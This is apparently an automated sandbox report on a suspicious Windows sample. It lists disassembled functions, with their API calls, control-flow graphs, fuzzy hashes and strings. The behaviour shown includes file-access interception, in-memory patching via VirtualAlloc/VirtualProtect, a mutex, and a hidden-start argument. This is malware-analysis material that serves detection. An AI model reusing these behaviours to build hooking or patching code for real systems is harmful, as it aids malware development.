                                                                                                                              • Part of subcall function 070641FD: FindClose.KERNEL32(?), ref: 0706426D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$Filelstrcat$CloseFirstNextlstrcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1879274390-0
                                                                                                                            • Opcode ID: 8af313923bb07023a55c4ac66069c8520caa648c5f57acff3dc1ab27e9a43229
                                                                                                                            • Instruction ID: 9081da09aba1cadf945909dbd7a4d57dc0c7406cf53e3290254af59d0544d461
                                                                                                                            • Opcode Fuzzy Hash: 8af313923bb07023a55c4ac66069c8520caa648c5f57acff3dc1ab27e9a43229
                                                                                                                            • Instruction Fuzzy Hash: F701D6F25042829FCB219F34DC5DA8B7FE9EB15341B424661F106D2211DA38C6108B21
                                                                                                                            Function 07064BB7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 7 7064bb7-7064bc0 8 7064bc2-7064bc9 7->8 9 7064c11-7064c2e CreateFileW 7->9 8->9 10 7064bcb-7064bdd StrRStrIW 8->10 10->9 11 7064bdf-7064bf1 StrRStrIW 10->11 12 7064c07-7064c0e 11->12 13 7064bf3-7064c05 StrRStrIW 11->13 13->9 13->12
                                                                                                                            APIs
                                                                                                                            • StrRStrIW.SHELL32(?,00000000,07062E63), ref: 07064BD5
                                                                                                                            • StrRStrIW.SHELL32(?,00000000,C:\Users\user\AppData\Roaming\fat\), ref: 07064BE9
                                                                                                                            • StrRStrIW.SHELL32(?,00000000,.log), ref: 07064BFD
                                                                                                                            • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 07064C26
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID: .log$C:\Users\user\AppData\Roaming\fat\
                                                                                                                            • API String ID: 823142352-1129110882
                                                                                                                            • Opcode ID: 3e83f0f9e9a5d5ccc0b465a92b0860685f84ff2c0b72718761f39d1112cceb83
                                                                                                                            • Instruction ID: 3fece4ac68d7ff4adfcc1682eaa43331a7de747a484ba9de228a23eaf46a355d
                                                                                                                            • Opcode Fuzzy Hash: 3e83f0f9e9a5d5ccc0b465a92b0860685f84ff2c0b72718761f39d1112cceb83
                                                                                                                            • Instruction Fuzzy Hash: BB016D7220024ABBCF525F65DC5AF8B3FA5FF18764F048224F915A91A1DB7AC260EB50
                                                                                                                            Function 07064B3D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • StrRStrIA.SHELL32(?,00000000,07062E5B), ref: 07064B5B
                                                                                                                            • StrRStrIA.SHELL32(?,00000000,C:\Users\user\AppData\Roaming\fat\), ref: 07064B6F
                                                                                                                            • StrRStrIA.SHELL32(?,00000000,\log\), ref: 07064B83
                                                                                                                            • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 07064BAC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\fat\$\log\
                                                                                                                            • API String ID: 823142352-2537490315
                                                                                                                            • Opcode ID: 158216dd6bedd5a0fc7b3319a860ffcd023fe9122ca6671e002e3afeb53782a6
                                                                                                                            • Instruction ID: 7285d1f455eb7f5e7e528b56916296f2bbdc9c4727231fcd60ffbc2f43176e89
                                                                                                                            • Opcode Fuzzy Hash: 158216dd6bedd5a0fc7b3319a860ffcd023fe9122ca6671e002e3afeb53782a6
                                                                                                                            • Instruction Fuzzy Hash: D6011D7120024AFBDF515F95DC5AF9A3FE9FF05754F008225FA15A80A0D7BAC660DB40
                                                                                                                            Function 07064E18 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51stringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Roaming\fat\, xrefs: 07064E43
                                                                                                                            • C:\Users\user\AppData\Roaming\fat\, xrefs: 07064E59
                                                                                                                            • -AHIDE -ASTART, xrefs: 07064ED7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmplstrlen
                                                                                                                            • String ID: -AHIDE -ASTART$C:\Users\user\AppData\Roaming\fat\$C:\Users\user\AppData\Roaming\fat\
                                                                                                                            • API String ID: 898299967-807603291
                                                                                                                            • Opcode ID: d0d5663ac9830f152538eff5ee5857aefd135ccff5b5075167564ee33501e7db
                                                                                                                            • Instruction ID: 0a6d5bbfdc54589f080af8902a61b5171ac71969a330f855b0a46397350b4414
                                                                                                                            • Opcode Fuzzy Hash: d0d5663ac9830f152538eff5ee5857aefd135ccff5b5075167564ee33501e7db
                                                                                                                            • Instruction Fuzzy Hash: 591152F1690354FEE7907B70DC2AF8A36E9EB00714F518351B350A90D1DABD5A548E2A
                                                                                                                            Function 070641FD Relevance: 6.0, APIs: 4, Instructions: 44filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrcmp.KERNEL32(?,070641FB), ref: 070641FE
                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 07064251
                                                                                                                            • FindClose.KERNEL32(?), ref: 0706426D
                                                                                                                              • Part of subcall function 07064210: lstrcmp.KERNEL32(?,0706420D), ref: 07064211
                                                                                                                              • Part of subcall function 07064210: lstrcat.KERNEL32(?,?), ref: 0706422C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Findlstrcmp$CloseFileNextlstrcat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 360925478-0
                                                                                                                            • Opcode ID: df376b26f4071ed67b7d6ac83fc98c77ab5eff411329c3a661190221dd55037e
                                                                                                                            • Instruction ID: d016308b3b39e05bcd60cb43a1d69bd4974c8b88d14201a2fb0f7d6b01c17445
                                                                                                                            • Opcode Fuzzy Hash: df376b26f4071ed67b7d6ac83fc98c77ab5eff411329c3a661190221dd55037e
                                                                                                                            • Instruction Fuzzy Hash: F801D1F2504186AFCB52AF38DC5DA9E7FE9EB16345B1206A1F106D1211DF388A608B32
                                                                                                                            Function 07064210 Relevance: 6.0, APIs: 4, Instructions: 36stringfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 46 7064210-7064219 lstrcmp 47 706424a-7064259 FindNextFileA 46->47 48 706421b-7064244 lstrcat 46->48 49 70641f6-7064206 call 70641fd 47->49 50 706425b-7064274 FindClose 47->50 48->47 49->47 54 7064208-7064219 call 7064210 49->54 54->47 54->48
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileNextlstrcatlstrcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 122021188-0
                                                                                                                            • Opcode ID: 527067ad32a0bed7e5f4a9c25d17938efa701b79111dcdf75ce785e8cae4976d
                                                                                                                            • Instruction ID: b58d46a0085d181eff2b5c11778440dba4ae8643dab637fb342bad256ccfeb63
                                                                                                                            • Opcode Fuzzy Hash: 527067ad32a0bed7e5f4a9c25d17938efa701b79111dcdf75ce785e8cae4976d
                                                                                                                            • Instruction Fuzzy Hash: 6FF090F2500145AFCB215F38DC49A9B3FF9EB55345F120561F206D1111DB388A619B31
                                                                                                                            Function 07064A0A Relevance: 4.6, APIs: 3, Instructions: 101memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 58 7064a0a-7064a1f 59 7064a25-7064a30 58->59 60 7064b1f-7064b21 58->60 61 7064a32-7064a35 59->61 62 7064a37-7064a3e 61->62 63 7064a4a-7064a71 VirtualAlloc 61->63 62->60 68 7064a44-7064a48 62->68 63->60 64 7064a77-7064a84 63->64 66 7064a86-7064a99 64->66 67 7064aa9-7064b13 VirtualProtect * 2 64->67 70 7064a9f-7064aa1 66->70 71 7064b16-7064b19 67->71 68->61 70->71 72 7064aa3-7064aa6 70->72 71->60 72->67
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000005,00003000,00000040,07064F3C,07088D70,00000000,Tjs,07064C31,07088D20,00000000,070649CC), ref: 07064A6C
                                                                                                                            • VirtualProtect.KERNEL32(?,00000005,00000040,00000000), ref: 07064AEF
                                                                                                                            • VirtualProtect.KERNEL32(?,00000005,00000000,00000000), ref: 07064B13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$Protect$Alloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2541858876-0
                                                                                                                            • Opcode ID: c2ee980d06ee6299001cc78cbc22669a741c60400df149e93d93a037ae2cf8b6
                                                                                                                            • Instruction ID: d3080dbed19508d9a6edd4bb73a7cbdc39d793aed116e02065eaf3964b9a3485
                                                                                                                            • Opcode Fuzzy Hash: c2ee980d06ee6299001cc78cbc22669a741c60400df149e93d93a037ae2cf8b6
                                                                                                                            • Instruction Fuzzy Hash: 203154B5A0020AEFDB11DFB4C958E9EBBF9EF44740F158259F901A7294D774DA00CB60
                                                                                                                            Function 07064D7D Relevance: 4.5, APIs: 3, Instructions: 27stringsynchronizationCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 74 7064d7d-7064d88 StrRStrIA 75 7064dc4-7064dd3 CreateMutexA 74->75 76 7064d8a-7064d9c lstrlen 74->76 77 7064dd7-7064dda 75->77 78 7064dd5 75->78 76->75 80 7064d9e-7064da0 call 7064da8 76->80 78->77 82 7064da5-7064da6 80->82 82->75
                                                                                                                            APIs
                                                                                                                            • StrRStrIA.SHELL32(?,00000000,07064D74), ref: 07064D80
                                                                                                                            • lstrlen.KERNEL32(?), ref: 07064D8B
                                                                                                                            • CreateMutexA.KERNEL32(?,?), ref: 07064DCB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateMutexlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2542342894-0
                                                                                                                            • Opcode ID: ecdafdb22cedd250096534cca25e636da4a06d4c24eba122f98eff74b15daa98
                                                                                                                            • Instruction ID: b81b1f362ee2ad241df6c7191a9dbda3eb3625633ed8fc9e24ff20f647811c92
                                                                                                                            • Opcode Fuzzy Hash: ecdafdb22cedd250096534cca25e636da4a06d4c24eba122f98eff74b15daa98
                                                                                                                            • Instruction Fuzzy Hash: 7EE048B29017A5ABDBA16FB1DC5DB9A3BE8EF01254B154725FA01D9080DB38C710C761
                                                                                                                            Function 07001000 Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 07001035
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 07001099
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000003.2864608852.0000000007001000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateFileHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3498533004-0
                                                                                                                            • Opcode ID: fbb43184b826b6abe57b31de2b775d04d5eb9ecacda1644dcf87349424a33543
                                                                                                                            • Instruction ID: e40146005b04525ebc40bd926a600e087f003db07dc5e13284d53aaa9afdd3c4
                                                                                                                            • Opcode Fuzzy Hash: fbb43184b826b6abe57b31de2b775d04d5eb9ecacda1644dcf87349424a33543
                                                                                                                            • Instruction Fuzzy Hash: B9112EB4600305EFEB616FB4CD4AF697AE9FB04300F25C261A980DB2D9DA75D9049B51
                                                                                                                            Function 07064DB5 Relevance: 3.0, APIs: 2, Instructions: 15synchronizationCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 83 7064db5-7064dd3 wsprintfA CreateMutexA 85 7064dd7-7064dda 83->85 86 7064dd5 83->86 86->85
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateMutexwsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1107950-0
                                                                                                                            • Opcode ID: 491ee96da1f39f85aaac83f462c2d47c91582d13e4a2c114ce5e36d15c476d3e
                                                                                                                            • Instruction ID: cafd495364a64e36139761136ce8f89e460d9b9187980917f828461c85346606
                                                                                                                            • Opcode Fuzzy Hash: 491ee96da1f39f85aaac83f462c2d47c91582d13e4a2c114ce5e36d15c476d3e
                                                                                                                            • Instruction Fuzzy Hash: 28D0A7B2500240ABCF512F94D88DA4A3FD4EF112543008514F6058A040D2398220CB50
                                                                                                                            Function 07064365 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 87 7064365-706439b SetErrorMode
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 07064397
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: ca7b281a12b0b7647c3544942ef7c396436fecb16222069f8ebc2359776df8dd
                                                                                                                            • Instruction ID: 20f5efdd5c674b482dfdf73b9e128a54450311da8c48ca4aae8bffa2b20fd338
                                                                                                                            • Opcode Fuzzy Hash: ca7b281a12b0b7647c3544942ef7c396436fecb16222069f8ebc2359776df8dd
                                                                                                                            • Instruction Fuzzy Hash: 47E0ECB1D01308EFDB51DFA4D60978DB7F4BB10308F6181A4C44163244EB799F08AB41

                                                                                                                            Non-executed Functions

                                                                                                                            Function 07064CEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Roaming\fat\), ref: 07064D05
                                                                                                                            • PathRemoveBackslashA.SHLWAPI(?), ref: 07064D0C
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Roaming\fat\, xrefs: 07064CFF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BackslashPathRemovelstrcpy
                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\fat\
                                                                                                                            • API String ID: 295623078-178331175
                                                                                                                            • Opcode ID: a39342556eb7ab5296919c58edf7365be4ccb98003bc7c0226d44063d451486b
                                                                                                                            • Instruction ID: 4b51851e8d6340bfc13950c0290d63b7647a5e4e80919def392702345bc62003
                                                                                                                            • Opcode Fuzzy Hash: a39342556eb7ab5296919c58edf7365be4ccb98003bc7c0226d44063d451486b
                                                                                                                            • Instruction Fuzzy Hash: E5E012B211024AAFDB419F94EC85C5F3BDDEB092587504511FE02D2152D77DC9109A60
                                                                                                                            Function 07064D2F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Roaming\fat\), ref: 07064D47
                                                                                                                            • PathRemoveBackslashA.SHLWAPI(?), ref: 07064D4E
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Roaming\fat\, xrefs: 07064D41
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.2873047154.0000000007064000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.2873024875.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873084261.0000000007083000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873152970.0000000007087000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873190200.0000000007088000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873222406.0000000007089000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.2873248470.000000000708A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BackslashPathRemovelstrcpy
                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\fat\
                                                                                                                            • API String ID: 295623078-178331175
                                                                                                                            • Opcode ID: 1de1ee97ffc6210c07a49096eba40424e2487dfb1125305f258881edb8ab58fe
                                                                                                                            • Instruction ID: b7aa53c062d021360cebb573085495b96d27f4e679348dda5f87e0ad0931c3f8
                                                                                                                            • Opcode Fuzzy Hash: 1de1ee97ffc6210c07a49096eba40424e2487dfb1125305f258881edb8ab58fe
                                                                                                                            • Instruction Fuzzy Hash: 6FD05E736155646BCAE1BA64A80ACCF37DCEA627643018201F942E7240D2ACE600CBE5